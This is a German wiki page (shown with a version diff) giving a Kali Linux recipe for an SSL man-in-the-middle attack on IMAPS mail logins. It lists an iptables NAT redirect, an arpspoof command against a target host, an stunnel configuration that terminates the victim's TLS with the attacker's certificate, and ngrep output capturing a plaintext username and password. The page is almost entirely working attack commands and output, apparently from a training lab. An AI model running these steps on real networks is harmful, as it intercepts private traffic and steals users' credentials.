SSL Man in the Middle: Unterschied zwischen den Versionen

Aus xinux.net
Zur Navigation springen Zur Suche springen
 
Zeile 1: Zeile 1:
 
=Kali Linux=
 
=Kali Linux=
 
==nat==
 
==nat==
*iptables -t nat -A PREROUTING -i eth0 -p tcp -d thor.tuxmen.de --dport 993 -j REDIRECT --to 6666
+
*iptables -t nat -A PREROUTING -i eth0 -p tcp -d thor.tuxmen.de --dport 993 -j REDIRECT --to 993
 +
 
 
==arpspoofing==
 
==arpspoofing==
 
*arpspoof  -i eth0 -t 192.168.244.26 -r 192.168.244.100
 
*arpspoof  -i eth0 -t 192.168.244.26 -r 192.168.244.100

Aktuelle Version vom 2. September 2016, 09:44 Uhr

Kali Linux

nat

  • iptables -t nat -A PREROUTING -i eth0 -p tcp -d thor.tuxmen.de --dport 993 -j REDIRECT --to 993

arpspoofing

  • arpspoof -i eth0 -t 192.168.244.26 -r 192.168.244.100

stunnel

  • cat /etc/stunnel/stunnel.conf
debug = 7
options = NO_SSLv2
output = /var/log/stunnel.log

[to-server]
client = yes
accept = 0.0.0.0:143
connect = thor.schmeich.de:993
verify = 2
CAfile = /etc/stunnel/ca.crt

[from-client]
accept  = 0.0.0.0:993
connect = 127.0.0.1:143
cert = /etc/stunnel/kali.mim.org.crt
key = /etc/stunnel/kali.mim.org.key
CAfile = /etc/stunnel/ca.crt
  • stunnel4 /etc/stunnel/stunnel.conf

ngrep

  • ngrep -d lo -s 1500 -l -i 'login' port 143
interface: lo (127.0.0.0/255.0.0.0)
filter: (ip or ip6) and ( port 143 )
match: login
#
T 127.0.0.1:45277 -> 127.0.0.1:143 [AP]
  . login badura suxpass.                                            
##